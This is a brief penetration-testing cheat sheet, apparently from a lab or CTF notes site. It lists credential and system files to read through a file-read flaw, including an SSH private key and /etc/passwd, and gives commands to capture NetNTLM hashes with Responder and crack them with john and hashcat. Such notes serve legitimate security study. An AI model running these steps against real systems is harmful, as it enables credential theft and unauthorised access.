Try to read following files :-
/etc/passwd
/home/user/.ssh/id_rsa
/etc/ssh/sshd_config
/etc/hosts
Link
https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/arrow-up-right
By default responder starts on port 80
sudo responder -I tun0 -wv
Crack the hash
john hash hashcat -m 5600 /usr/share/wordlist/rockyou.txt hash
Last updated 7 months ago